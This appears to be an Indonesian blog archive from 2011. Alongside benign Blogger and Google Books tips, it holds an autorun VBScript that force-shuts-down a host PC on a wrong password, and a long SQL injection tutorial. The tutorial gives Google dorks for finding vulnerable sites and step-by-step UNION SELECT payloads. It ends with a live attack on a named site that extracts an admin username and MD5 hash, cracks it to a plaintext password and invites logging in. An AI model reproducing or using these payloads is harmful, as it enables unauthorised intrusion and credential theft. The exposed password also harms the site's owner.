  4. Open “Temporary Internet Files” folder. Copy all PNG files. These files are nothing but the pages of the scanned book
  5. You can print the png files and arrange them in order for reading.
Please share other methods that can be used to extract the books from Google book search service.

Sabtu, 18 Juni 2011

Membuat Navigasi Breadcrumb di Blogger

Tidak terasa sudah satu minggu saya tidak update blog ini. Hal ini dikarenakan saya sedang sibuk menata ulang konten di blog ini dan menambah beberapa tool ke dalamnya. Salah satunya adalah navigasi Breadcrumb.

Breadcrumb merupakan salah satu plugin milik Wordpress yang berfungsi untuk memudahkan pembaca dalam menelusuri halaman blog. Jadi ibarat peta atau sitemap dalam blog.

Plugin ini biasanya diletakkan diatas halaman posting. Contoh tampilannya seperti ini:
navigasi breadcrumb
Selain dapat memudahkan pembaca dalam mengetahui lokasi halaman yang sedang ditelusuri, plugin ini juga dapat mengoptimasi halaman blog di search engine (SEO). Bahkan dianjurkan langsung oleh Google lho. Tidak percaya? Berikut adalah kutipan yang saya ambil dari ebook 'Google Search Engine Optimization Starter Guide'.


Ingin mengetahui lebih banyak teknik-teknik SEO dalam ebook Google Search Engine Optimization Starter Guide? Silahkan baca disini.

Ok saya rasa cukup penjelasannya, untuk pengguna wordpress anda bisa download plugin Breadcrumb disini. Sedangkan untuk pengguna blogger ikuti langkah-langkah berikut untuk memasang navigasi breadcrumb:

1. Buka Blogger. Masuk ke menu Design -> Edit HTML

2. Beri centang pada 'Expand Widget Templates'.

3. Setelah itu, cari kode <b:if cond='data:post.title'>

4. Letakkan kode berikut dibawah <b:if cond='data:post.title'>

<b:if cond='data:blog.pageType == "item"'>
<div class='breadcrumb'>
<a expr:href='data:blog.homepageUrl' rel='tag'>Home</a> &#187;
<b:if cond='data:post.labels'>
<b:loop values='data:post.labels' var='label'>
<a expr:href='data:label.url' rel='tag'><data:label.name/></a>
<b:if cond='data:label.isLast != "true"'>,</b:if>
</b:loop>
&#187;
</b:if>
<data:post.title/>
</div>
</b:if>
5. Selanjutnya cari kode ]]></b:skin>

6. Letakkan kode css berikut diatasnya

.breadcrumb {
padding:5px 5px 5px 0px;
margin: 0px 0px 10px 0px;
font-size:90%;
line-height: 1.2em;
border-bottom:3px double #e6e4e3;
}
7. Jika sudah simpan template anda dan lihat hasilnya.

Semoga bermanfaat :)

Cara Share Postingan Blog otomatis ke Facebook

Jika anda ingin postingan blog anda dapat dibaca oleh lebih banyak orang maka salah satu cara yang harus anda lakukan adalah mensubmit RSS feed ke Facebook. Dengan mensubmit RSS feed blog anda ke Facebook, maka setiap kali anda memposting artikel baru, artikel tersebut akan otomatis muncul dihalaman profil facebook anda, sehingga teman atau sahabat facebook anda dapat membaca artikel blog anda langsung di halaman profil facebook anda. Jika artikel anda bagus tentu mereka akan mengunjungi blog anda untuk membaca lebih lanjut sehingga dapat turut mempromosi blog anda.

Mengenai cara mensubmit RSS feed ke Facebook sebenarnya sudah pernah saya posting di blog ini. Namun karena Facebook telah mengganti tampilan halamannya dan fitur untuk submit RSS juga sudah ditiadakan sehingga cara sebelumnya sudah tidak dapat digunakan lagi.

Meskipun Facebook sudah tidak menyediakan fitur untuk submit rss feed. Namun kini ada banyak aplikasi facebook yang dapat melakukan tugas ini. Salah satunya yang saya gunakan adalah RSS Graffiti.

RSS Graffiti akan secara otomatis mensubmit postingan blog anda ke halaman profil facebook anda setiap kali anda update posting sehingga anda tidak perlu submit artikel secara manual ke facebook.

Apa yang harus anda lakukan hanya buka aplikasi RSS graffiti dan tambahkan alamat feed blog anda. Setelah itu semuanya akan berjalan secara otomatis.. tis.. tis.. tis

Selain itu, RSS graffiti juga menyediakan beberapa pengaturan sehingga anda dapat mengkustomisasi tampilan feed sesuai dengan yang anda inginkan.

Beberapa fitur yang disediakan oleh RSS graffiti antara lain:

  1. Memperbolehkan anda untuk mengatur tampilan artikel dalam bentuk feed biasa atau pesan singkat seperti Twitter
  2. Menyaring artikel dari tanggal tertentu
  3. Memberi pesan tambahan pada setiap artikel yang dipublikasi
  4. Mengatur jadwal posting
  5. Mempublikasi twitter tweak ke facebook

Cara mensubmit RSS Feed ke RSS Graffiti

1. Login ke Facebook.
2. Buka aplikasi RSS Graffiti dan jalankan.
3. Setelah itu, klik Add Feed.
4. Kemudian akan muncul halaman seperti berikut

Feed URL: isi alamat feed blog anda. Contoh http://bloganda.blogspot.com/feeds/posts/default
Source Name: Isi nama blog anda
Source URL: Isi alamat blog anda
Post style: Biarkan saja 'Standard'. Jika anda ingin postingan muncul dalam bentuk pesan singkat seperti Twitter pilih 'Compact' atau 'Status updates'
5. Jika sudah tekan Save. Selesai

Sekarang setiap kali anda memposting artikel, artikel tersebut akan secara otomatis muncul dihalaman facebook anda.

Cara Download E-book di Google book

Sebelumnya saya pernah menjelaskan dimana kita bisa mencari dan membaca buku dengan Google books tapi sayangnya kita harus membaca buku secara online. Sehingga kurang fleksibel bagi yang tidak memiliki koneksi internet atau menggunakan koneksi limited. Nah agar anda bisa membaca buku tanpa koneksi internet. Anda bisa menggunakan Google Book Downloader. Dengan Google book downloader, anda bisa mendownload buku langsung ke PC anda. Sehingga anda bisa bebas membaca buku yang anda inginkan kapanpun tanpa harus tersambung ke internet.

Bagi anda yang ingin mendownload buku dari Google books. Berikut caranya:

1. Download Google book downloader disini

2. Setelah itu instal program Google book downloader di komputer anda. Untuk pengguna windows XP, anda harus menginstal aplikasi Microsoft .NET Framework 3.5 SP1 terlebih dahulu. Jika belum punya, silahkan download aplikasinya disini.

3. Jika sudah, kunjungi situs Google books untuk mencari buku yang anda inginkan.

4. Jika sudah ketemu, lihat pada address bar. Disana ada tulisan http://books.google.com/books?id=xxxxxxxxxxxx

5. Copy teks yang dicetak tebal

6. Kalau sudah, buka Google Book Downloader

7. Pada bagian Book code, masukkan kode yang anda copy sebelumnya

8. Klik Check untuk menganalisa

9. Kemudian klik Download all. Tunggu beberapa saat hingga proses download selesai.

10. Jika sudah, klik Save entire book as untuk menyimpan filenya ke komp anda.

11. Selesai. Selamat membaca...

Cara mudah mencari dan baca E-book di internet

Ntah kapan Google menambahkan fitur pencarian baru yaitu Google books/ Buku Google pada halaman utama Google Search. Tapi yang pasti dengan adanya fitur ini tentu akan memberikan pilihan tambahan bagi pengguna internet untuk mencari informasi.


Sesuai dengan namanya maka fitur yang satu ini berfungsi untuk menelusuri buku-buku yang ada di internet. Buku-buku yang ditelusuri berasal dari perpustakaan dan penerbit buku yang ada diseluruh dunia. Sehingga rata-rata buku yang ingin anda cari bisa ditemukan disitu.

Dan hebatnya adalah Google books menampilkan sebagian besar dari konten buku yang ingin kita cari sehingga kita bisa menikmati isi bukunya tanpa harus merogeh kocek untuk membelinya atau berdiri lama ditoko buku untuk membacanya. Tapi anda cukup masuk ke Google books lalu mengetik judul buku yang ingin anda baca lalu dengan seketika buku yang ingin anda cari akan muncul dihadapan pc anda dan siap untuk disantap. hehehe.. kayak makanan aja :)

Nah sebagai contoh saya mencari buku "Rich Dad Poor Dad". Dan berikut adalah hasil tampilannya.


Untuk membaca halaman berikutnya tinggal discroll ke bawah atau drag keatas seperti layaknya membaca file .pdf. Jika anda tertarik untuk membeli bukunya, Google books juga menyertai alamat toko buku yang menyediakan buku tersebut. Sehingga anda bisa dengan mudah mendapatkan buku yang anda inginkan.

Punya buku yang ingin dicari atau dibaca? Langsung aja ke TKP sengihnampakgigi

Rabu, 08 Juni 2011

Membuat Flash disk berpasword

1. Buka Notepad
( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepad dan Enter) lalu copy paste script kode dibawah ini ke notepad
Code :
Content
on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject(“Wscript.shell”)
set fs=createobject(“Scripting.FileSystemObject”)
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject(“wscript.shell”)
do while quest=”"
quest=inputbox(“Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!”, “masukkin password gan!”)
if quest=”" then
m=MsgBox(“Maaf anda belum memasukkan password…!”, 0+0+48, “http://pedasmaniscinta.blogspot.com”)
end if
loop
if quest=”TULIS PASSWORD DISINI” then
s.run “shutdown -a”
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
else
s.run “shutdown -s -t 0″
end if
TULIS PASSWORD DISINI ganti sesuai keinginan ente, itu adalah sebagai tempat password ente. Pemakaian huruf kapital sangat berpengaruh. ane sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama “passwordlock.vbs” tanpa tente kutip, sebelum di save as pastikan pilih all files.
2. sesudah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis sesudah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad.
Code:
Content
[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK udah DIPASANG PASSWORD
ente bisa ngerubah kata “FLASHDISK UDAH DIPASANG PASSWORD” sesuai kata-kata mutiara keinginan ente sendiri.
sesudah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah “autorun.inf” tanpa tanda kutip, sebelum di save as pastikan pilih all files.
Kemudian pindahkan kedua file yang udah ente buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk ente.
langkah terakhir silahkan ente hidden autorun.inf dan passwordlock.vbs yang udah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf dan passwordlock.vbs lalu pilih properties centang kotak yang ada di tanpa hidden.
ne gw tambahin…
klw mw hide autorunnya pke scirpt super hiden aja..
ne gw ksh tutorialnya..
prtma lu buka dulu cmd
caranya
klik start–>run–>ketik cmd
trus masukin script ini
Code:
Content
f:>attrib +h +s passwordlock.vbs (buat hiden file yg prtma)
trus..
Code:
Content
f:>attrib +h +s autorun.inf (buat hidden file autorun)
klw mw munculin tinggal ganti tanda “+” dengan tanda “-”

Senin, 06 Juni 2011

Tutorial SQL Injection

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database
Credit: Madun & Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:


Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

Binus Hacker Tutorial

Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:

Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)

Credit: Easy|Hack & Revision By BinusHacker Team